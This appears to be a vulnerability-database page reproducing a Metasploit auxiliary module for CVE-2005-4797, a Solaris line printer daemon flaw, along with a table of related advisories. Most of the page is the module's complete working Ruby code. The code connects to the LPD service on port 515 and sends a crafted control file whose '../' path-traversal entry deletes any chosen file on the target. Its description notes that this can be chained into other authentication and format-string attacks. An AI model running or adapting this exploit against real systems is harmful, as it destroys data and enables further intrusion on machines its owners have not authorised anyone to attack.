Lucene search
K

Solaris LPD Arbitrary File Delete

🗓️ 18 Sep 2006 00:33:16Reported by hdm <[email protected]>, Optyx <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Solaris LPD Arbitrary File Delete module exploits a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system, including rpc.walld format string flaw, missing krb5.conf authentication bypass, or simply system files

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-4797
29 May 201815:50
circl
Check Point Advisories
Sun Solaris printd Daemon Arbitrary File Deletion (CVE-2005-4797)
25 Oct 200900:00
checkpoint_advisories
CVE
CVE-2005-4797
5 May 200623:00
cve
Cvelist
CVE-2005-4797
5 May 200623:00
cvelist
NVD
CVE-2005-4797
31 Dec 200505:00
nvd
Packet Storm
Solaris LPD Arbitrary File Delete
31 Aug 202400:00
packetstorm
Tenable Nessus
Solaris 10 (sparc) : 120467-05
18 Aug 200500:00
nessus
Tenable Nessus
Solaris 10 (x86) : 120468-05
18 Aug 200500:00
nessus
Tenable Nessus
Solaris 7 (sparc) : 107115-20
12 Jul 200400:00
nessus
Tenable Nessus
Solaris 7 (x86) : 107116-20
12 Jul 200400:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris LPD Arbitrary File Delete',
      'Description'    => %q{
        This module uses a vulnerability in the Solaris line printer
        daemon to delete arbitrary files on an affected system. This
        can be used to exploit the rpc.walld format string flaw, the
        missing krb5.conf authentication bypass, or simply delete
        system files. Tested on Solaris 2.6, 7, 8, 9, and 10.

      },
      'Author'         => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-4797' ],
          [ 'BID', '14510' ],
          [ 'OSVDB', '18650' ]
        ]
      ))

      register_options(
        [
          Opt::RPORT(515),
          OptString.new('RPATH', [ true, "The remote file path to delete"]),
        ])
  end

  def run


    r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
    r_user     = Rex::Text.rand_text_alpha(rand(8)+1)
    r_spool    = Rex::Text.rand_text_alpha(rand(8)+1)

    # Create a simple control file...
    control = "H#{r_hostname}\nP#{r_user}\n";

    # The job ID is squashed down to three decimal digits
    jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Establish the first connection to the server
    sock1 = connect(false)

    # Request a cascaded job
    sock1.put("\x02#{r_hostname}:#{r_spool}\n")
    res = sock1.get_once
    if (not res)
      print_status("The target did not accept our job request command")
      return
    end

    # Theoretically, we could delete multiple files at once, however
    # the lp daemon will append garbage from memory to the path name
    # if we don't stick a null byte after the path. Unfortunately, this
    # null byte will prevent the parser from processing the other paths.
    control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"

    dataf = Rex::Text.rand_text_alpha(100)+1

    print_status("Deleting #{datastore['RPATH']}...")
    if !(
        send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
        send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
      )
      sock1.close
      return
    end

    print_good("Successfully deleted #{datastore['RPATH']} >:-]")
    sock1.close
  end

  def send_file(s, type, name, data='')

    s.put(type.chr + data.length.to_s + " " + name + "\n")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file command (#{name})")
      return
    end

    s.put(data)
    s.put("\x00")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file data (#{name})")
      return
    end

    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
    return true
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2017 13:26Current
CVSS 25
EPSS0.29182
27